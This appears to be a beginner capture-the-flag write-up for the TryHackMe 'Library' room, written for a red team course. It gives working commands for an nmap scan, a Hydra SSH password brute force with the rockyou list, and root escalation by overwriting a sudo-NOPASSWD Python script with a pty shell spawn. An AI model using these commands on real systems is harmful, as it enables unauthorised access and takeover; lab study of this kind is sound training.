This is a write up covering steps taken to solve a beginner level security challenge, find user.txt and root.txt flags for Library room in TryHackMe platform.
This blog is written as part of task of Masters Certification in Red Team Program from HackerU.
Step 1 : Connect to TryHackMe and start target machine.
- Download OpenVPN configuration setting from TryHackMe platform
- Connect to TryHackMe by running the command in kali terminal:
sudo openvpn /pathtoOVPNfile.ovpn
3. Start machine in ‘library’ room — target ip address will be displayed in a minute.
https://tryhackme.com/room/bsidesgtlibrary
Step 2 : Information gathering using Nmap
- Start nmap scan of the target ip:
nmap -A -O <target ip>
Step 3: Detailed Findings
Open ports:
22 : SSH
80 : http Apache httpd 2.4.18
- Navigating to robots.txt got hint as “rockyou”
2. Accessing open ports
port 80 : Username is displayed as author
3. Since port 22 is open, try to brute force and find user credentials with above found username and clue from robots.txt
hydra -l meliodas -P /usr/share/wordlists/rockyou.txt 10.10.43.179 ssh
4. Login with above found credentials through SSH, login is successful
ssh meliodas@<targetip>
5. Found user.txt
6. checking for privileges
sudo -l
7. As bak.py has permission to run with sudo NOPASSWD , so remove bak.py and create a new file.
rm bak.py
echo ‘import pty;pty.spawn(“/bin/sh”)’ > /home/meliodas/bak.py
8. Run bak.py file with sudo permission >user got root access
sudo python /home/meliodas/bak.py
9. Navigate to root folder > found root.txt file
With these steps, I was able to answer questions posted in Library room on TryHackMe.
Thank you for reading this blog..